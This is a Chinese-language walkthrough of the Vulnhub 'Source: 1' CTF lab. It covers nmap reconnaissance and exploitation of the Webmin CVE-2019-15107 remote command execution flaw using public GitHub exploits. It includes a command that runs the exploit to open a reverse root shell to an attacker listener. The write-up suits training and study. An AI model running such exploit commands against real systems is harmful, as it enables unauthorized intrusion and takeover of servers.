Vulnhub-Source-1(CVE-2019-15107)

一、靶机搭建

选择打开选项

选中下载的ova文件,然后导入选择一个存放路径即可

如果遇到不兼容的情况,可以打开**.vmx**修改,改为和虚拟机一个版本号

二、信息收集

官方信息

复制代码
Name: Source: 1
Date release: 17 Jul 2020
难度:初级
描述:为 AttackerKB 聊天室创建的简单 CTF 盒子。这是练习的独立版本。这个框可能会出现在供应链攻击的后续房间里,因为它是一个很好的最新例子。

扫ip

靶机ip:192.168.108.154

扫开放服务和端口

开放了22和10000端口

指纹探测

bash 复制代码
nmap 192.168.108.154 -p 22,10000 -sV -sC -O --version-all 

没什么可以利用的信息,看到10000 端口版本信息,MiniServ 1.890 (Webmin httpd)

目录扫描

dirsearch扫描看看,扫不出来

dirb扫描,无结果

三、Web渗渗透

访问10000端口,是一个登录网站,源码和指纹信息都没有什么利用点

想到刚才找到的网站版本号,查找一下历史漏洞

下载下来查看一下,需要结合msf才能使用

CVE-2019-15107-Webmin远程命令执行漏洞

上网搜一下看看,存在漏洞,参考文章:

php 复制代码
https://github.com/squid22/Webmin_CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file

下载exp到kali

四、提权

赋予权限

开启监听端口,并执行脚本

bash 复制代码
./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444

拿到root权限

在跟目录下发现flag

flag:THM{UPDATE_YOUR_INSTALL}

相关推荐
Whoami!4 分钟前
5-4〔OSCP ◈ 研记〕❘ SQL注入攻击▸基于 UNION 的SQLi
网络安全·信息安全·sql注入·oscp
kali-Myon11 小时前
NewStarCTF2025-Week2-Pwn
算法·安全·gdb·pwn·ctf·栈溢出
christine-rr17 小时前
linux常用命令(6)——网络管理
linux·服务器·网络·ubuntu·网络安全
合作小小程序员小小店19 小时前
Web渗透之身份认证与访问控制缺陷(越权(水平垂直),访问控制(没有验证),脆弱验证(Cookie,JWT,Session等))
安全·web安全·网络安全·asp.net·网络攻击模型
kali-Myon1 天前
NewStarCTF2025-Week2-Web
web安全·sqlite·php·web·ctf·文件上传·文件包含
亿.61 天前
羊城杯 2025
web·ctf·writeup·wp·羊城杯
啦啦9117141 天前
Wise Duplicate Finder查重清理软件!一键查重,支持批量处理!
5g·网络安全
我不是QI1 天前
DES 加密算法:核心组件、加解密流程与安全特性
经验分享·算法·安全·网络安全·密码学
搞科研的小刘选手2 天前
【通信&网络安全主题】第六届计算机通信与网络安全国际学术会议(CCNS 2025)
大数据·人工智能·网络安全·vr·通信工程·网络技术·计算机工程
Che_Che_2 天前
论文阅读-IDFUZZ: Intelligent Directed Grey-box Fuzzing
论文阅读·网络安全·模糊测试·定向模糊测试